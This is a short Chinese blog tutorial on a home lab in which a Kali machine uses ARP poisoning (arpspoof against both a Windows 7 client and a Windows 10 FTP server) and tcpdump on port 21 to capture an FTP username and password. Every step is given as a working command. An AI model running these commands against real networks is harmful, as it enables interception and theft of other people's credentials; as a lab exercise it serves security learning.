ARP投毒之获取密码

2018-04-23  本文已影响0人  不吃鱼的猫_de06

配置环境:
kali(中间人):192.168.3.90
win7pro(PC机):192.168.3.91
win10(ftp服务):192.168.3.83
*三台主机相互PING通

实验原理:PC机访问本网络的一台FPTserver服务的主机,中间人kali进行arp投毒,获取PC机和FTPserver主机之间的回话记录,截获用户名和密码。

图片.png

step1:中间人kali开启路由转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward


step2:进行ARP投毒

1:PC机要向FTPserver发送报文,kali欺骗PC机说自己是FTPserver;
指令:arpspoof -i eth0 -t 192.168.3.91 192.168.3.83


图片.png

2: 接下来开始欺骗FTP,同理,kali(中间人)进行欺骗,欺骗FTP说自己是PC机
指令:arpspoof -i eth0 -t 192.168.3.83 192.168.3.91

图片.png

step3:

kali(中间人) 进行抓包模式
指令:tcpdump -i eth0 -nn -X tcp port 21

图片.png

step4:

之前我们在win10上用(3CDaemon)搭建的FTP的用户名为admin 密码为123456

step5:

我们在win7pro上进行ftp命令,连接到win10(FTPserver)上,并输入之前搭建的FTP账户和密码


图片.png

step6:

查看刚刚我们用kali的抓包,可以准确的截获用户名和密码


图片.png
上一篇下一篇

猜你喜欢

热点阅读